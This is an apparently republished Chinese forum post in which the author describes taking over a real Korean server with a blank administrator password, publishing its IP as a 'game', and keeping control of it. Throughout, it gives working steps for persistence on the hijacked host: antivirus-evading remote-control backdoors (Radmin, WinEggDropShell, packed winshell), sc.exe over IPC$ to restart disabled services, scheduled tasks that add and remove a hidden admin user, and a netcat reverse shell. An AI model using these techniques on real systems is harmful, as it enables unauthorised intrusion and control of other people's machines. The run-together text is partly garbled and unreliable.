你能拿到这台机的一个文件吗

作者：小菜更新时间：2025-03-17 点击数：

简介：首先申明，我很菜的，绝对是一个菜鸟。

今天忽然很有兴趣想跟我一样菜的菜鸟来玩这个游戏。

当做一个小测试吧。

所以如果你是高手的话就不用往下看了。

今天花了点时间对台肉机

【菜科解读】

首先申明，我很菜的，绝对是一个菜鸟。

今天忽然很有兴趣想跟我一样菜的菜鸟来玩这个游戏。

当做一个小测试吧。

所以如果你是高手的话就不用往下看了。

今天花了点时间对台肉机作了点小小的安全配置。

韩国机。

没做IP策略。

没做端口过滤。

端口开放：21，25，80，135，139，445，3306，3389211.42.93.200administrator密码为空。

（绝对是管理员帐号）任务是：拿到c:\winnt\system.txt,读出里面的内容。

说明：至少有3种以上的方法可进入主机答案是用sc.exeSORRY,由于我的疏忽（我只检查了2次），造成无法IPC连接。

因为是弱口令，所以之前已经有同行进入肉机并且做了个bat文件来删除IPC$.而我也只是断了他留下了的后门（当时并没有发现这个BAT文件，真失败），所以后来我看到有人说无法IPC连接，我才上去netshareipc$这个“小游戏”是我又看了沉睡不醒的>一时兴起做的，目的是想看大家的思路，下面是我的具体做法和对>的一点补充：1，查看补丁情况HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows2000HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\HotFix发现已打了SP3补丁，省事，倒也省了我不少工夫。

2，修改注册表，禁止空连接，删除admin$,C$,D$等等。

关掉Admin$服务器：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\ParametersAutoShareServer=DWORD:00000000工作站：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parametersAutoShareWks=DWORD:00000000禁止空会话：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSARestrictAnonymous=DWORD:00000001或者“控制面板”-“本地（域）安全策略”-“安全选项”里......立刻从新启动lanmanserver服务，使其生效。

注意：现在并没有删除IPC$连接。

3，看一下有没有可疑帐号，如肉机是server以下版本，用CCA.EXE查看是否有克隆帐号，如是AD-server就看一下管理员有没有可疑帐号，有就删除它吧。

4，我在肉机上装了RADMIN，winshell(脱壳并加壳，目的是防止被杀毒软件杀掉），WinEggDropShell。

为了防止其他人进入肉机，用WinEggDropShell的fport功能，打开“服务”窗口看一下没有可疑服务，进程，有的话就停服务杀进程(pskill),删除相关的程序。

5，虽然有开80端口，但只是默认装了IIS，肉机本身并没有什么网站，而且而且也装了SP3，不会有什么漏洞。

更详细的资料请看>6，服务”-“snmpservice”-“属性页”-“安全”那个“接受团体名称”也就是“public”，它就是snmp访问口令。

把它改成一个安全的口令。

小心！一些暴力破解。

这个漏洞，危害虽然没有那么直接，但还是有的，暴露系统的类型和具体的版本，获取帐号列表，运行服务信息.....。

7，开了3306端口，用的mysql，没有什么漏洞。

如是MSSQL，就要小心了，看看补丁情况，没补的话就补上吧。

8，虽然现在除了IPC$，没有什么C盘D盘的共享了，但已防万一，把at.exe改一下名。

禁用并停止WMI服务，禁用并停止再删除telnet服务（从注册表中删除）9，停止远程注册表服务（RemoteRegistryService),这个也很危险喔）10，虽然administrator是管理员帐号，但是我禁止了它登陆终端服务器）。

好了，现在用终端连接服务器，opentelnetRTCS.vbe,psexec也连不上了。

因为psexec默认用的c:\winnt\system32\cmd.exe，但删除C$，所以使用psexec显示拒绝访问。

我试过建个共享文件夹，copy个cmd.exe到这个文件共享文件夹，然后再用psexec也不行。

那现在只能用的是ipc$,也到了SC.EXE出场了，一个常被人忘记的程序。

我们只是禁用并停止了WMI服务，但我们仍然可以用打开WMI服务，而不用理会这个服务是否禁用，是否需要手动开启。

而且就算这个服务被删除了，我们也可以重新创建它。

sc\\ipconfigWinMgmtstart=auto看到命令成功的提示了吗？那现在就可以用eva的那个RTCS.vbe来telnet了，同样，可以利用还有telnet服务。

如果你用终端连接服务器登陆的话会发现administrator没有登陆会话权，其实只是“计算机管理”－帐号－“属性”－“禁止登陆终端服务器”而已。

用sc开启远程注册表服务，然后“连接网络注册表”修改注册表使其重新启动后可以登陆。

其实我们大可做ipsec来过滤掉135,135,445端口，但这样做改动太大，怕管理员发现，而且肉机如果是日文，韩文，那怎么办？如果我们做了个BAT文件来删除IPC$,并且每次随肉机启动而运行。

这个连sc.exe也没用了。

我们还有下面的做法，利用计划任务，这个方法是星云大哥以前提过的1).在晚上10点运行这个3个命令netshareipc$netuseruserpassword/addnetlocalgroupadministratorsuser/add2).在早上6点运行这个3个命令netshareipc$/delnetlocalgroupadministratorsuser/delnetuseruser/del用命令行来做吧，够隐蔽其实我们还可以加个 nc你的本机IP54>>nc-ecmd.exe上去上面的程序行，（当然这个nc.exe是传上去的，不过小心被杀掉，一般杀素软件都认为nc.exe是病毒）然后在本机用nc-l-p54这时nc就会反向发一个shell给你，防火墙就会为你转发数据。

数一数，装了5个后门1,Radmin2,WinEggDropShell3,winshell4,计划任务来建用户，也算后门吧5,nc.exe开反向连接后门本文写得很乱，也没有一点技术的细节，因为我太菜，上面只是我的一点体会让我们一起进步吧。

。

你能,拿,到这,台机,的,一个,文件,吗,首先,